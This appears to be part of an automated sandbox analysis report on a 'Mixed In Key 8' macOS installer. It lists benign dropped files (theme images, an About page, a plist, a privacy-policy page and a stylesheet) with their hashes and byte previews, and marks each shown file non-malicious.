                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_TpRUMw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 44 x 44, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):447
                                                                                                    Entropy (8bit):7.316707006483209
                                                                                                    Encrypted:false
                                                                                                    MD5:2DD935B011D02BCB06B68E3AE41D6551
                                                                                                    SHA1:0D110A67331FD07233808D7605A0A765751F4561
                                                                                                    SHA-256:5E0977973DC355274F89298416E19A61C93E563A596CCC82D7B62D58EEC8FD21
                                                                                                    SHA-512:93AFE8A63EDE4A8242D2D991FA20E28FEACF74F9073F0BB80BA6BA00F01ABBB7019A2DE6C6F2FA3EF96A33CD3E4D94BE2CD9C8ED1783D8461CA4DFA96271A794
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...,...,.......Z.....tEXtSoftware.Adobe ImageReadyq.e<...aIDATx...1n.0.E.y..E.N...wiF.!=Q.\... ..6@..H.......>..p1,..&i.p^....$..\k..h)..Y.....@..?.D.y.x{..M...........bU=b....{;Y.<..lJg.D..~*./..p..}....:...X..k..b..G.....8...f?4.^..!h.0S.5.l.....k.^.-.IA.Z.....4$...1S.]E.X.tU..X..k..z...-.1d..X.........Z..9.f..\...V.....&....8..x....V....V....Vs...V{D...0....a}J...J..3..p.{K.%..5.....;s..U..|..........]...s.T....+....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_WeemUQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 40 x 76, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):4293
                                                                                                    Entropy (8bit):7.789638893526219
                                                                                                    Encrypted:false
                                                                                                    MD5:DEB2446FBBF5FA708348D76A2AB2D541
                                                                                                    SHA1:26FC3F0E7F0603A5C0663A525C8BD75C39765262
                                                                                                    SHA-256:41C556FAE0A8FE1B690393244D14381FFD902587578B366C7EF3C23A6A058639
                                                                                                    SHA-512:FC9AC66D9EF0DA305BFA02313A0CC3EEE0580513BE69D7BA45A6BD3E91680FE07DCFC1F1475BE8EBA7ABFECFD958E1756BAEDC7E725D9D33B0B46E521B482B60
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...(...L.......bv....iCCPICC Profile..H....TSY...{/..B..z.........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv.....|........n.=....\c.x......L~...=&6......Q..P`..<...@.j..W}.D...c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q.....\9...|r..f.....0O... P.L~2....<=.....`P6..9\..Qva.0.y(.=`...b......Ou..R3A\..L........#..3W..........C..J../lf>t...V......2...lO3."...c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}...!......+3%.o...q?.D/oq..).............+......f..l.S....uB...8 .0.+31gf_....U|NrJ&..=%.t..ejL.4...`.........%H.0.....Q.Mr.s...h.....|N;...G.8.....fs3[.`..H.Y.......&....'....?... .,.,..2..d.<....".........u..8.Z.9p.\.7A/........`.|.S...!*D.. uH.2.,!{......0(....!.$...MP.T..C..z...,t....A...h.z.}.........l....p.../....p.......j.8.._.o....~.O".!#...b..#.H...$!|d-R..".H#..t#w.......ah.:......DbX.......rL.........L`.c.X........`.....l).........a?.p8y..........V......p..>.(n...+......<.../....._.......d.:...C.#p.....c...~.3..Q..Ct$....U.....v.m
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_XExM02
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 30 x 40, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):2813
                                                                                                    Entropy (8bit):7.909683961433022
                                                                                                    Encrypted:false
                                                                                                    MD5:21D7C4DD99961496E8F8F52F3D242619
                                                                                                    SHA1:55108EB8E48FAE7AAFE7DCF44FF28DD946396053
                                                                                                    SHA-256:7EC92ED78741EDD37CA1309F0434FFD074424A340C42472B8541552E7F474B74
                                                                                                    SHA-512:F13E6BF6F358894531BFF5884FFCB1C0ADB933011560C9C7014DACC8E3FCC4F766F513B16245BD2D47AFE9E8BA737C5CD9B68DF973D26A431EB44B141E1DA44B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......(.....fq.E...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e..........;s.....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K..B...|A6..<..s%Y2.$...4.......QV.q..6.....d....Q.Y.Y....;P..#.......#...|.e.ti...7(.3..l.0..]"...l.2E...Ay...J.,N....24O.8.Y........g..vtd3}..........q.|&'3#.+Z...;......L.......,...._._..z.;.z...e...A..o.o..l.........fK,..e......... ..@..Y.a..%E".r........x...~.......a.y.......)H.J.%LYQy...R13;...0Y..bt...8+.Yy.....b..=*..2.(.m../..3EL...:...f. ./s....#./...7.....`hd...GW..}.$F.......2.(......\.~...d.....`......oB.........-................ ......R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. .......@(.....dH.I.U.F..*....P..#t...].z....4.........aM......;..G...dx).......p5|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,...l..c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w.....M..x5........%.||.......?..C ...6.oB.AD.@
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_dQUagz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):43612
                                                                                                    Entropy (8bit):7.686593151643444
                                                                                                    Encrypted:false
                                                                                                    MD5:90BE9B3CDB26E7911F80D71718F3245F
                                                                                                    SHA1:A0232E3978B9478316533A0FA46C631ACEC222EF
                                                                                                    SHA-256:F949FA512A0A2EF1B81A080977EBF6453EDCD59048F5EF2E2ABBBAE346AEAF81
                                                                                                    SHA-512:B54E57081CC0A2F6AB58A96D05926CC03D0F6428CAA2014ACCB57236A310F87ED797699A2E05DD546E6D656EB8FB07EBC3F541228B1D579D86E75F2E4AB31446
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*..]2.. P8$....BaP.d6...DbQ8P....;............`.....@`@..N...@@......?.o(...?{._......... P.)..@._.J.V.W.VkU..v._.XlV;%..g.ZmV.e..o...,.+...&...y8.T........(....2. .L......L..#.I....^.#.?........>.`'...:}?./.....z9..GS3f.e....Px...T...g7...tz]>.W...v{Gv`<&.....0Y)....@ `@FL.....-x.9...>..._.....d.....~......I.>..p[/.$pp.|5...{(..8.....y....z.......X.....&%5..m....u....}.... ....@........ .........; ..`....mx..@.\%..2....s...Jg...A.....pl....,........'.8..)..u....s.Lq.Y6`!dt..Q.!S..5M...=O.........}.$.............>.\............KpK..X*(..@...e.....B.]..N.(.: .e.; S...$g.......o....X.l!83..Yv@...E{....}......... G....A..\WU..+.....Y..._Y.f5db/.;[3.....2..]....i.v...$s...[h-.8.g.J.\U..K..i.q....M. @.L.$..u_..........W....bh...C...I....b..ib....eX..j......ds.e.?.......[..V...A.&j..S....s..:g.<.<.o.N.....}....}.......V....o]....e.....3.G....;\....}...=........NO..3...A...T.^O.M...y.k=...w...._.[.._.}(.6.....t.W.......u..y......P..@R..C.....~..<?JH#..4.<Uj..bh.i...f.........1....b....1+.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_nPiSFg
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):622
                                                                                                    Entropy (8bit):7.404463141396479
                                                                                                    Encrypted:false
                                                                                                    MD5:BBDC220AEA5CAD4E2FF300D0E519B088
                                                                                                    SHA1:4FFB02B3788FED06697141332B78132108276A5C
                                                                                                    SHA-256:8C61AF9BC4290727DC65B052B3149F10392B2A202C3B9B33F9937EF4945FB228
                                                                                                    SHA-512:03710D41B9056FA6FBFEB0A8756F9470A32959CAA80A9DA10C2C9C8C833AD5128570E30FF2F9F1EE830A0A5C2BDB7A746C985ED85910EC08925BABC4A5E3B3B6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx....m.0.@M....L@:....t.`.....(.....H' ..L..P[.T.u...+H=........h>...I....".+........I"........-.c$...z...W......`.....F..J.d!..1...r.1....W.#..%..<;k....k_....`..........9c..........C..........g..%..F5a..].B...P.W.....cBW....e#.H ........D.q@K....#.......mY......$.}."..v...S?Dx.......%":....>@.25...#@.m@.R.!.......J..P.s..?@X..t]A..$..*..rb.......G.*.#........]..)b.&....a....m...C..#......s..%,.s..%.m-..u)R%...j(t...kk..~...H(.E.l..=.-.J../b.....'H..e.P#..6...=%fS....}./......m.1........0R:..<..+.....jh ..x.P.JY;R.#../....e,.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_qQ2L7a
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):559
                                                                                                    Entropy (8bit):7.483323322503398
                                                                                                    Encrypted:false
                                                                                                    MD5:5380EBE31A48AD7A056836C7A524562F
                                                                                                    SHA1:44EA8FB34D4D99E6106FBBC397B1D0A2A1C63B88
                                                                                                    SHA-256:EACA04DF83B1722C80CDA74061F069497AF4298E72B1622B0B6BD76DD7676D1A
                                                                                                    SHA-512:8CED57661DFE4B2A6C3AB38AE54DF5F9FBFFC1137F3839833AF26F898601E813FB59158C4EB6DDE03503155D9455D45B773010F43A0712F5155378EE2E34BAEF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx....m.0.E...0.7(... ..n..m'.:...d...a............w...../..N....Yy..@y.#\..>.....=.......n.^U....5....~.>...@y...S...Cr...... G..]...n...U..I.C.32}pq.w../0U.v.)....l..m.@..P.Y).h.R.&..`P.....J....6....S..4j..,.fTk.q\..&...{...6.MZa..9...&..i..../........M..Mb......ZdI...-r......2!..`.]...Q...[G...%.k.<x...09QA8..%...P9....h%S-.....B.).+&X.T|...^x.!.V.A...s..d5/...x@.?A..?/t..\....R..@H(I..J.:Z...j%..`.......An....ENi..H.u+ )...@"......re.+@..Z...:...'[...`..fa.zp{.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_sUd9Mf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 10 x 40, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):2841
                                                                                                    Entropy (8bit):7.910899373244266
                                                                                                    Encrypted:false
                                                                                                    MD5:1088016EB173212F3BBE06D89F636997
                                                                                                    SHA1:5AA13897E238C86B8DA6F30BCE9FE25555CCA457
                                                                                                    SHA-256:1130C6D18D21AD293AC39F62085D43DF312562BD573CA3ABD62FA80F8FE989BB
                                                                                                    SHA-512:6D487515B505C38DBF850F0ED23B730D62043C73FCC34BA7C97E048BDBFE4FAD682727528BD3E2BCB9A672480ABA6A37375DC8493E89D51F862C3D256BBA3F4D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......(.....H4.....CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e..........;s.....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K..B...|A6..<..s%Y2.$...4.......QV.q..6.....d....Q.Y.Y....;P..#.......#...|.e.ti...7(.3..l.0..]"...l.2E...Ay...J.,N....24O.8.Y........g..vtd3}..........q.|&'3#.+Z...;......L.......,...._._..z.;.z...e...A..o.o..l.........fK,..e......... ..@..Y.a..%E".r........x...~.......a.y.......)H.J.%LYQy...R13;...0Y..bt...8+.Yy.....b..=*..2.(.m../..3EL...:...f. ./s....#./...7.....`hd...GW..}.$F.......2.(......\.~...d.....`......oB.........-................ ......R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. .......@(.....dH.I.U.F..*....P..#t...].z....4.........aM......;..G...dx).......p5|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,...l..c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w.....M..x5........%.||.......?..C ...6.oB.AD.@
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_u97jfB
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 18 x 35, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):3708
                                                                                                    Entropy (8bit):7.730834492790864
                                                                                                    Encrypted:false
                                                                                                    MD5:D24DBD3A38FD6660C76874584E6784A8
                                                                                                    SHA1:BDA0CC006DE711AC14D6826C9DC4559D49509A46
                                                                                                    SHA-256:B9A4B5E37C1ED4DD9E1BFD2FA505BE413D8DC2A88D229B0296CF598029FE9495
                                                                                                    SHA-512:80D6783C918BED958B8284160859F76515B0EB874B0D2E0E33477C4026C479A0D917E7A37B6CCD90B839E58E90A13384592FB3053FFB7775513C728070A78676
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......#.............iCCPICC Profile..H....TSY...{/..B..z.........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv.....|........n.=....\c.x......L~...=&6......Q..P`..<...@.j..W}.D...c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q.....\9...|r..f.....0O... P.L~2....<=.....`P6..9\..Qva.0.y(.=`...b......Ou..R3A\..L........#..3W..........C..J../lf>t...V......2...lO3."...c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}...!......+3%.o...q?.D/oq..).............+......f..l.S....uB...8 .0.+31gf_....U|NrJ&..=%.t..ejL.4...`.........%H.0.....Q.Mr.s...h.....|N;...G.8.....fs3[.`..H.Y.......&....'....?... .,.,..2..d.<....".........u..8.Z.9p.\.7A/........`.|.S...!*D.. uH.2.,!{......0(....!.$...MP.T..C..z...,t....A...h.z.}.........l....p.../....p.......j.8.._.o....~.O".!#...b..#.H...$!|d-R..".H#..t#w.......ah.:......DbX.......rL.........L`.c.X........`.....l).........a?.p8y..........V......p..>.(n...+......<.../....._.......d.:...C.#p.....c...~.3..Q..Ct$....U.....v.m
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_wyWM1A
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 56 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):869
                                                                                                    Entropy (8bit):7.658809722807515
                                                                                                    Encrypted:false
                                                                                                    MD5:4C804C93213D0FBC2FCA2D7590B63EAE
                                                                                                    SHA1:9507D931B84229F9673975F037B133CFC54F441A
                                                                                                    SHA-256:50C5EF8B2A85900DE0959F2527C3F84CA1EA068DBA98CB44ADF3C3DB5417DB18
                                                                                                    SHA-512:D3A4209DB3AD64778A4D4F82609452777F6A0AFB475B820B256FA47B83448B4673123C711172B0C7D8ACC51E6EFB854D34E659B3B22AB3B5094F736E01D35864
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.U.0.5y..6.m...f...............&H:Ar.4L.n.lPx.$.lKI.C....Kl.[..-..m[A,.R.tf<..Bi.tg<....@.d.t..!..n..I.j..*..-......}?L....M...l....x]|P....TL+..{..b.J........JL..YP.LFlf.....J...P.........P....jI.&T...&....4).....k<..>...x...6.......m.@...p...$...~S..I.M......n........9A4.aZ.K2..e.yT.....`'B%.].`...~........,..e..Iu...qy.0WpO...5..\.:4.&.. .yv;....o.....>..C....XjH.\..;.....~Q.tM...{.1.^...&...D......E.H..Od.....p.9...-c..=`..5....dK..g.p7.{.f.7..Qr..r.`a.......K6..`1........q...K..^........J.>......0=.5.z....a......a..;0...ab="{.FzVA2p..tm...}q......^.....1..b...SO]/...Z.i.G.%.b.@...d...M.._6.+(..6>.......l...Nu........A..rIa...........^.g.}..|...s.[.x...m.sA_.....t.a...F.....Y.U.L.]J8G.....L.{.I}.+..PW..G..8qu..*..*.t9.......VCl9(..b.......N.....g.........~.t&Q.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_y1xog0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):85030
                                                                                                    Entropy (8bit):7.946426330164176
                                                                                                    Encrypted:false
                                                                                                    MD5:2AA6E3DEF55FAF02590EC9A5DA3B350B
                                                                                                    SHA1:135A47BC355470CDBE99FEBEE0E9FCAB5B6ABA7A
                                                                                                    SHA-256:12A1DB8E5286C1E54042AE5E407CB8EEE53B522190C01123F2885896E164CFFA
                                                                                                    SHA-512:9963A9DDDD9C21C2A0C629102467E431D8708A418F93AEEA6F06F4D022740EF5E0060622656A999261A014170623CB65936631BAF4FA2050144F035B8150780E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...R.............>...................................T....2016:08:11 00:18:09..?.@.$....BaP.d6...DbQ8.V-..FcQ..v=..HdR9$.M'.JeR.d.]/.LfS9..m7.Ng@...w?.PhT:%..G.RiT.e6.O.TjU:..{U.VkU..v._.XlV;%..g.A.. ...o.K.n...|.........<..07h%.z.....\T*.{.c`........j.....~...9..G......[T'C..@..P......v..~3'..b..|.+A....z\.....g2...'....o{-......:....G..v5w...y...0.;..[..o.....t...S..2..2...S.............O.E..Os:.9....C...........s|.6/4E.<p...71{.......2.`:.....!....#!.|.%....u..s..0.B...N$x..R....0....Nd..8.....S$3..pd^.Ds..1@p.A-M.t..M.4....$]+O/#.......Gn\5......S....K.t.%D...7G.e4.J....G.k...n.....2..6..q.........{9..+.4....d1...b.q5{,.O..5....W-..GUYmmih....2.... ..m..Phe....}.w.g.B.......M........Y..v.1q.B.R6m..O..!z.05..U3.0.`L$..5.Ee<:-..1..69.b7..7./<uO72...V.N%.<....`u.1.Y1M.m8o.v..........h..4..fr<...x.........tn.xP.MD.........~.....!.q...c.........I/........;...a!....my...ER.)B.|.V...v5..X.....$.he.....,...g....r....V=u.....C.....e..W..V.oo...<C..~/)%M.....Z...{~.5*`..e+..]...|.^......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/aboutbox/.BC.T_DTZAsi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:HTML document text
                                                                                                    Size (bytes):3015
                                                                                                    Entropy (8bit):5.362206122271343
                                                                                                    Encrypted:false
                                                                                                    MD5:47DF574B4DDBE9244AFEF234B763EAD4
                                                                                                    SHA1:268CD4046D013CB7812D127202E906B82EF30C0A
                                                                                                    SHA-256:D568880AF7357E07AF8F5DD80F7BBEED5DECEAC6AAB2C8C1306BA04CC129C348
                                                                                                    SHA-512:D30D1F11EEB0C1E4AEB643A0513B8C4DB2E433917FDD35F0B79FE381CDA26BD4A58D90451717A48DC2A588DCBA2C537F7A7796448669DE6419E76B380A3D65A7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<meta http-equiv="Content-type" content="text/html; charset=utf-8">..<title>About</title>..<style type="text/css" media="all">...body {....margin:0;....color:black; background:white;...}......table.grid {....margin:20px 0 0 90px;....font:14px "Roboto", sans-serif;....color:#00204E;...}...td { padding:3px; line-height:19px; }...td.left {....width:45%;....vertical-align:top;...}.....div.button {....position: absolute;....right:30px; bottom: 30px;....font:14px "Roboto-Medium";....-webkit-user-select: none;....padding: 5px 18px 7px 12px;....color: white; background: #04B7FF;....border-radius: 5px;....box-shadow: 0 6px 13px 0 rgba(0,127,178,0.20);....cursor: pointer;...}...div.button:active {....background: #00A7EF; darkens -->...}...div.button span.icon {....padding: 7px 6px 9px 6px;....vertical-align: bottom;....font:19px "MaterialIcons-Regular";...}.....#icon {....float:left;..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/aboutbox/.BC.T_G3aUaX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):295
                                                                                                    Entropy (8bit):5.393672171921907
                                                                                                    Encrypted:false
                                                                                                    MD5:45B67BC02536D1969A3FEBF40AF61C72
                                                                                                    SHA1:B14CD58D80C8C271E70E0D35B379A5F7CA2CBCF6
                                                                                                    SHA-256:F712FE6BC14B3001DECB3E5CCF1C4E832BC2F253D2F660E4E1D29FF71A53A737
                                                                                                    SHA-512:9E157D72206694752D030877B93937355A21444643908B4F766C17EEFCA6AC52C94604ED3FD24C86A63930C4F699350A2A07FDA11208CC77E0D3C46BD78CE97B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>MIKAboutBoxWidth</key>..<integer>590</integer>..<key>MIKAboutBoxHeight</key>..<integer>490</integer>.</dict>.</plist>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_DDWUz0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:HTML document text
                                                                                                    Size (bytes):888
                                                                                                    Entropy (8bit):5.146333270847403
                                                                                                    Encrypted:false
                                                                                                    MD5:E546AE7E8A4C2836A1152A16DC1F45A2
                                                                                                    SHA1:ECE21CF32B45EDDA8F873CE3F2FC8957EC4603E7
                                                                                                    SHA-256:30DCF79F6D7AEA60B151BF404B75AA42A0116D53762D3EDACB622C275B33BCA8
                                                                                                    SHA-512:56CEA575185EDD38C10460B4F27BB0026127FE6FA04C4970CD7E93253B8E1A4958229167EF5B523002A8615B4BB723D2E1E74BDA2ADE91C5048132FD42E5EFF3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<meta http-equiv="Content-type" content="text/html; charset=utf-8">..<title>Platinum Notes End User Agreement</title>..<link rel="stylesheet" type="text/css" href="style.css" media="all">.</head>.<body>..<div><img class="logo" src="./miklogo.tiff" alt="Mixed In Key logo"></div>..<h1>Mixed In Key</h1>..<h2>Privacy Policy</h2>..<p>To function correctly Mixed In Key needs to collect some user data. Protecting your privacy and your personal data is very important to us.</p>..<p>Before clicking 'Accept' below, please read and review our Privacy Policy carefully to understand which data we collect, and why.</p>....<div class="box">Read our <a href="https://mixedinkey.com/privacy-policy/" title="Opens in your default web browser">Privacy Policy</a> online</div>.</body>.</html>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_dW6NfH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):950
                                                                                                    Entropy (8bit):5.087178611335652
                                                                                                    Encrypted:false
                                                                                                    MD5:323150A399821CCA4F26F1D8AD63BE03
                                                                                                    SHA1:03B11B38E248392C11826F5771574F8296C75272
                                                                                                    SHA-256:9B89DEE51261A3421A0A0B982BC3BD93EF830BDE8741248251F40AF5CBF04904
                                                                                                    SHA-512:589F3A96E22FF28557EC295FDF1D85F92F7EF06DEFDE272DCB9CC246BF053AA88CD5E0E1F5325C42F8ED83875AF96907BEA7229FC2784197596268EFC5751D2D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*.Style sheet for the EULA and Privacy Policy pages.*/.body {..position:relative;..margin:0;..padding:15px 30px;..font:10pt Verdana, Helvetica, sans-serif;..color:black; background:white;.}..img.logo {..float:right; height:75px;..margin:0 0 0.5em 0.3em;..padding:13px;.}..h1 {..height:38px;..margin:0 auto 20px auto;..border-bottom:3px solid #2be;..padding-top:13px;..font:32px Helvetica, sans-serif;..color:#222; background:transparent;.}..h2 {..margin:1.9em auto 0.4em auto;..font:bold 1.2em Helvetica, sans-serif;.}..p {.margin:0.2em 0 0.6em 0; }..ol { padding:10px 35px;.}..li { padding-top:5px; }..div.box {..width: 40%;..margin: 50pt auto auto auto;..border: 1px solid #ddd;..border-radius: 4px;..color: black;..background: #eee;..text-align: center;..padding: 10px;.}..#footer {..margin-top:0.75cm;..border:1px solid #ddd;..padding:0.4em;..text-align:center;..font:0.9em Verdana, Helvetica, sans-serif;..color:#777; background:transparent;.}.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_oUgbsA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):64346
                                                                                                    Entropy (8bit):7.810290636072915
                                                                                                    Encrypted:false
                                                                                                    MD5:F4C30F0783040DCA7A07D55E293079BE
                                                                                                    SHA1:79CA6D309F331417B047D881024CD9169A5740A8
                                                                                                    SHA-256:F52EB3E731BACA57E3EC4D239D49BA57C3B607C6D09354AD18F61B50AA0A637D
                                                                                                    SHA-512:1E8644E806787A0E81FF2C94B04914B3D4E3D175930DE92FE79D9D95F5CAA33C55790FF838E810BC1119F969CA20136D71E72831331314FC9E7AEBBE9BB05CAF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
